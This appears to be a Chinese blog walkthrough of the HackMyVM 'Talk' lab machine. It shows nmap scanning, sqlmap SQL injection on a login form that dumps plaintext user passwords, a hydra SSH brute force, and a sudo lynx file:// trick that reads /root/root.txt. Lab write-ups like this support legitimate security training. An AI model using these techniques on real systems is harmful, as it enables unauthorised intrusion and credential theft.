guayu-kakeru
0%

HMV-Talk

发表于 更新于 分类于

HMV-Talk靶机复盘

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.112.47
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-19 11:09 CST
Nmap scan report for bogon (192.168.112.47)
Host is up (0.0024s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 e3:fc:1b:74:e5:e3:c9:ef:6d:ac:df:b1:1e:47:83:ad (RSA)
|   256 10:bd:60:33:a0:d1:a4:7d:de:c8:29:0a:c4:7d:b1:aa (ECDSA)
|_  256 4b:fc:30:a8:12:69:e7:b2:ce:ad:99:f1:66:12:cd:8c (ED25519)
80/tcp open  http    nginx 1.14.2
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: chatME
|_http-server-header: nginx/1.14.2
MAC Address: 7E:2E:BE:B7:58:B6 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   2.40 ms bogon (192.168.112.47)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.72 seconds

web探测


是一个登录界面,但是可以注册账号
注册之后可以登录,是一个聊天框

扫了下目录也没有其他的,这个登录位置也不能爆破,那就sql注入试试了
bp抓包login界面,把包内容放在一个txt文件里,然后用sql对这个文件扫描,指定字段是username
sqlmap可以成功sql注入,接下来就是爆库 爆表 字段,得到账户密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
┌──(root㉿kakeru)-[~/tmp]
└─# cat tmp.txt        
POST //login.php HTTP/1.1
Host: 192.168.112.47
Content-Length: 25
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.112.47
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.112.47//index.php?attempt=failed
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=mb3h6lao2hsvuiiduk34js813o
Connection: close

username=111&password=111
                                                                                                                    
┌──(root㉿kakeru)-[~/tmp]
└─# sqlmap -l tmp.txt -p "username" --batch   

┌──(root㉿kakeru)-[~/tmp]
└─# sqlmap -l tmp.txt -p "username" --batch --dbs
available databases [4]:
[*] chat
[*] information_schema
[*] mysql
[*] performance_schema

┌──(root㉿kakeru)-[~/tmp]
└─# sqlmap -l tmp.txt -p "username" --batch -D chat --tables
[3 tables]
+-----------+
| user      |
| chat      |
| chat_room |
+-----------+

┌──(root㉿kakeru)-[~/tmp]
└─# sqlmap -l tmp.txt -p "username" --batch -D chat -T user --columns --dump
[6 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| email     | varchar(255) |
| password  | varchar(30)  |
| phone     | varchar(255) |
| userid    | int(11)      |
| username  | varchar(30)  |
| your_name | varchar(60)  |
+-----------+--------------+

┌──(root㉿kakeru)-[~/tmp]
└─# sqlmap -l tmp.txt -p "username" --batch -D chat -T user -C username,password --dump
        ___

+----------+-----------------+
| username | password        |
+----------+-----------------+
| david    | adrianthebest   |
| tina     | davidwhatpass   |
| kakeru   | kakeru          |
| nona     | myfriendtom     |
| pao      | pao             |
| jerry    | thatsmynonapass |
+----------+-----------------+

然后用hydra爆破ssh

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kakeru)-[~/tmp]
└─# hydra -L user.txt -P pass.txt ssh://192.168.112.47                                                            
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-19 12:06:10
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://192.168.112.47:22/
[22][ssh] host: 192.168.112.47   login: nona   password: thatsmynonapass
[22][ssh] host: 192.168.112.47   login: david   password: davidwhatpass
[22][ssh] host: 192.168.112.47   login: jerry   password: myfriendtom
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-19 12:06:19

提权

登录nona用户,有一个sudo权限

1
2
3
4
5
6
7
nona@talk:~$ sudo -l
Matching Defaults entries for nona on talk:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User nona may run the following commands on talk:
    (ALL : ALL) NOPASSWD: /usr/bin/lynx

这个文件是个可执行文件,搜索了一下发现了是个网页查看器,而且可以用file协议读取文件

1
nona@talk:~$ sudo /usr/bin/lynx file:///root/root.txt